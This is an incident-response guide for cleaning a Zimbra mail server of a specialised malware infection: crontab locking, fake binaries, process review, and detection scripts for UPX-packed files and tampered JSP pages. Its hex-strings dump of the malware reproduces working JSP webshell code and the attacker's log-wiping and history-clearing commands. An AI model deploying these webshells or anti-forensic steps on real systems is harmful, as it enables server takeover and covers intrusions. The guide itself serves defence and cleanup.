
Yet another zmcat or counterpart cleaning guide for Zimbra

This zmcat derivative, and the attacker behind it, is highly specialized for Zimbra. A lot of the dropped files look like part of Zimbra but sit in a different path; interestingly there are no unexpected files in the /tmp folder. And something running in the background cleans or edits most of the log files.

So first we start by locking the crontab file, because something running in the background checks and overwrites the cron file as often as every second!!! Some Zimbra services fall over because of the uncontrolled I/O activity.
chattr +i /var/spool/cron/crontabs/zimbra

Then inspect all the records in the crontab file, not only the ones at the end of it. Some records look like Zimbra's own services, but really they are NOT!
For example 'zmmysqlstatus' is part of Zimbra, but the real zmmysqlstatus is a perl script located in /opt/zimbra/bin, while the fake zmmysqlstatus in the /opt/zimbra/libexec path is an executable binary file. Filenames like zmtrainsa, zmstat etc. can be anywhere!!
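To walk every cron record rather than only the last lines, and to catch the "script name, binary file" pattern described for zmmysqlstatus, here is an added shell script (not code from the original post). It reads crontab lines on stdin, takes the command path of each entry and reports whether that path is missing, a compiled ELF binary, or something else; the `demo` function builds constructed sample files in a temp directory so it can be tried without touching a Zimbra install. It assumes, as the post states for zmmysqlstatus, that the genuine Zimbra cron tools are perl or shell scripts, so every ELF hit is something to compare against the real tool under /opt/zimbra/bin by hand.

```shell
#!/bin/sh
# audit_crontab.sh (added example, not code from the original post)
# Reads crontab entries on stdin and classifies the command path of each one:
#   MISSING  the path does not exist
#   SUSPECT  the path is a compiled ELF binary; the fake zmmysqlstatus, zmtrainsa,
#            zmstat... are binaries, the genuine tools are scripts (stated in the
#            post for zmmysqlstatus, assumed here for the other names)
#   OK       anything else (still worth reading, but not this indicator)

# is_elf FILE -> exit 0 if FILE starts with the ELF magic bytes 7f 45 4c 46
is_elf() {
    [ -f "$1" ] || return 1
    [ "$(od -An -tx1 -N4 "$1" | tr -d ' \n')" = "7f454c46" ]
}

# cron_command LINE -> first token of the command part of a crontab entry
# (five schedule fields, or a single @reboot/@daily style field)
cron_command() {
    case "$1" in
        @*) printf '%s\n' "$1" | awk '{print $2}' ;;
        *)  printf '%s\n' "$1" | awk '{print $6}' ;;
    esac
}

# audit_crontab < crontab.txt -> one classification line per entry
audit_crontab() {
    while IFS= read -r line; do
        case "$line" in
            ''|\#*|[A-Za-z_]*=*) continue ;;   # blank, comment or VAR=value line
        esac
        cmd=$(cron_command "$line")
        if [ ! -e "$cmd" ]; then
            printf 'MISSING %s\n' "$cmd"
        elif is_elf "$cmd"; then
            printf 'SUSPECT %s (ELF binary where a script is expected)\n' "$cmd"
        else
            printf 'OK      %s\n' "$cmd"
        fi
    done
}

# demo -> runs the audit over constructed sample files; nothing here reads the
# real /var/spool/cron/crontabs/zimbra (for that: crontab -u zimbra -l | audit_crontab)
demo() {
    tmp=$(mktemp -d)
    printf '#!/usr/bin/perl\nexit 0;\n' > "$tmp/zmmysqlstatus"   # stands in for the genuine perl script
    printf '\177ELF\002\001\001' > "$tmp/zmtrainsa"               # constructed ELF header, stands in for a dropped binary
    printf '%s\n' \
        "0 * * * * $tmp/zmmysqlstatus > /dev/null 2>&1" \
        "*/5 * * * * $tmp/zmtrainsa > /dev/null 2>&1" \
        "30 1 * * * $tmp/zmstat" \
        | audit_crontab
    rm -rf "$tmp"
}

case "${1:-}" in --demo) demo ;; esac
```

Run it with `sh audit_crontab.sh --demo` to see the three outcomes on the constructed samples; on a real box pipe the zimbra user's crontab into `audit_crontab` while the file is still locked with chattr, so the listing cannot change under you.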

Now we inspect the suspected binary files using a hex editor like Bless. We found something like the strings below, including the attacker's life's work.

  rb  wb+ wb /proc/self/exe    ' | awk '{print $2}' | xargs kill -9 > /dev/null 2>&1;  ps aux | grep -v grep | grep ' touch -r     > /dev/null 2>&1 nohup   > /dev/null 2>&1 & ' / r /proc/%s %d (crontab -l |grep -v ' )|crontab -    crontab -l | grep -v grep | grep ' sed -i -E '/ ( )| /d'  /opt/zimbra/log/ .pid %Y/%m/%d f****************h - -     chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads delete: %s failed!
delete: %s successfully.
   /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp /Alert.jsp /Zimbra.jsp ")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>   <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request
.getParameter("     /opt/zimbra/jetty/webapps/zimbra/public/jsp /CryptCore.jsp /Crypt.jsp   "
.getParameter("ppwd"))){ in = Runtime.getRuntime()
.exec(new String[]{"/bin/sh","-c", request
.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((!=-1){out.print(new String(b,0,a));}out.print("</pre>");}else{out.print("</pre>");}%> <%if
(" write %s: successfully.
write %s: failed!
%s: exist.
zmstorewatch /tmp/ tor2web. wget curl /opt/zimbra/lib/ XZimbra\.jsp Ajax\.jsp attachment_blocked\.jsp Core Debug\.jsp static\.jsp ppwd= 66\.04 /opt/zimbra/log/*_log.20     /opt/zimbra/log/nginx.access.log history -c > /dev/null 2>&1 zmqueuelog /opt/zimbra/bin/ zmmysqlstatus /opt/zimbra/libexec/ /opt/zimbra/lib/ swatchdog zmclientcertmgr /opt/zimbra/bin zmtrainsa watchdog /opt/zimbra/common/bin/ zmstat /opt/zimbra/zmstat/ lwatchdog  Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk /tmp/.cache zmmailboxdwatch /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp   /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp        /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp       /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp      /opt/zimbra/jetty/webapps/zimbra/public/jsp/Online.jsp  /opt/zimbra/jetty/webapps/zimbra/public/404.jsp /opt/zimbra/conf/zmsstorewatch.cnf /opt/zimbra/conf/zmsstore.cnf        /opt/zimbra/lib/zmmailboxdwatch /opt/zimbra/lib/zmstorewatch /tmp/.cache/.ntp /tmp/.cache/.kthrotlds   ÿÿÿ

There are a lot of payloads: system object files, binary executables and scripts, mostly appended to the end of your real files or placed as completely fake .jsp files. Especially if you find binary files starting with UPX in the hex editor, you are on the right track.

Now use the 'top' command to look for anything running in the background. Then check the process path (real or fake) and, if it is fake, kill the process:

pwdx <PID>

kill <PID>

Repeat this for every suspected cron record. Note down all those file names and scripts.

All of these processes run under the zimbra user. You can use pkill to close every zimbra process, which shuts down your mail service but leaves you sure that nothing infected is still running; otherwise kill them one by one.

pkill -u zimbra

Now unlock the cron file and delete the unwanted lines using a text editor like nano.

chattr -i /var/spool/cron/crontabs/zimbra
cp /var/spool/cron/crontabs/zimbra /var/spool/cron/crontabs/zimbra_copy 
nano /var/spool/cron/crontabs/zimbra

Save the changes and review the cron file again. If something is still working in the background it will overwrite the file.

Assuming everything is okay, now lock the cron file again.

chattr +i /var/spool/cron/crontabs/zimbra

If you used pkill -u zimbra, you need to restart your mail server.

su zimbra
zmcontrol restart

Check your services; they should be working well.

zmcontrol status

Then remove all the noted files, but not by deleting them directly: copy them to a temp directory first. Check the end of the .jsp files and delete the infected lines. Restart your mail server, wait two minutes and check the status. If everything is okay, this means you have cleaned your servers. Then download and install the patch for your installation release from here.
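The two file checks from this guide, the UPX marker in the hex view of a binary and the Java shell code appended to the end of real .jsp pages, together with the "copy before you delete" rule above, as an added shell script that is not part of the original post. It takes a quarantine directory and a list of candidate paths (the ones noted during the cron and process review), reports each file as PACKED, SHELL or CLEAN, and copies every hit into the quarantine directory without removing anything. The .jsp markers are the calls visible in the strings dump above (Runtime.getRuntime().exec, defineClass, BASE64Decoder, Cipher.getInstance); the `demo` function works on constructed samples in a temp directory, and the 512-byte window for the UPX marker is an assumption, not a format rule.

```shell
#!/bin/sh
# triage_files.sh (added example, not code from the original post)
# For each candidate path noted during the cron/process review it reports two
# indicators the post describes, a UPX-packed binary and a .jsp carrying the
# appended Java shell code, and copies every hit into a quarantine directory
# rather than deleting it, so the originals survive for comparison and evidence.

# has_upx_header FILE -> 0 if the string "UPX!" occurs in the first 512 bytes
# (window size is an assumption; widen it if your samples differ)
has_upx_header() {
    [ -f "$1" ] && head -c 512 "$1" | grep -aq 'UPX!'
}

# jsp_markers FILE -> "lineno:text" for lines matching markers seen in the
# strings dump (runtime exec, custom class loader, base64 decoding, AES cipher)
jsp_markers() {
    grep -nE 'Runtime\.getRuntime\(\)\.exec|defineClass\(|BASE64Decoder|Cipher\.getInstance' "$1"
}

# is_webshell_jsp FILE -> 0 if FILE is a .jsp and contains at least one marker
is_webshell_jsp() {
    case "$1" in *.jsp) ;; *) return 1 ;; esac
    jsp_markers "$1" > /dev/null
}

# quarantine FILE DIR -> copy FILE with its mode and timestamps into DIR; the full
# path is folded into the name so two files called Crypt.jsp don't collide
quarantine() {
    mkdir -p "$2"
    cp -p "$1" "$2/$(printf '%s' "$1" | sed 's#^/##; s#/#_#g')"
}

# triage QUARANTINE_DIR FILE... -> prints PACKED / SHELL / CLEAN per file and a
# final HITS count; hits are copied into QUARANTINE_DIR, nothing is removed
triage() {
    qdir=$1; shift
    hits=0
    for f in "$@"; do
        if has_upx_header "$f"; then
            printf 'PACKED %s\n' "$f"
            quarantine "$f" "$qdir"; hits=$((hits + 1))
        elif is_webshell_jsp "$f"; then
            lines=$(jsp_markers "$f" | cut -d: -f1 | tr '\n' ' ' | sed 's/ $//')
            printf 'SHELL  %s (lines: %s)\n' "$f" "$lines"
            quarantine "$f" "$qdir"; hits=$((hits + 1))
        else
            printf 'CLEAN  %s\n' "$f"
        fi
    done
    printf 'HITS   %s\n' "$hits"
}

# demo -> runs triage over constructed samples in a temp directory
demo() {
    tmp=$(mktemp -d)
    printf '\177ELF\002\001\001UPX!' > "$tmp/zmstat"            # constructed: ELF magic plus UPX marker
    printf '%s\n' '<%@ page contentType="text/html" %>' '<html>ok</html>' \
        '<% Runtime.getRuntime().exec(cmd); %>' > "$tmp/Crypt.jsp"   # constructed: shell line appended to a page
    printf '%s\n' '<html>plain</html>' > "$tmp/index.jsp"        # constructed: untouched page
    triage "$tmp/quarantine" "$tmp/zmstat" "$tmp/Crypt.jsp" "$tmp/index.jsp"
    ls "$tmp/quarantine"
    rm -rf "$tmp"
}

case "${1:-}" in --demo) demo ;; esac
```

The SHELL line lists the matching line numbers, which is exactly what you need when trimming the appended code from the end of a real page; the rest of the file stays in place and the quarantine copy keeps the original mode and timestamps (the malware's strings show it using touch -r to blend those in, so they are worth preserving as evidence).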

Lastly, don't forget to change the passwords.
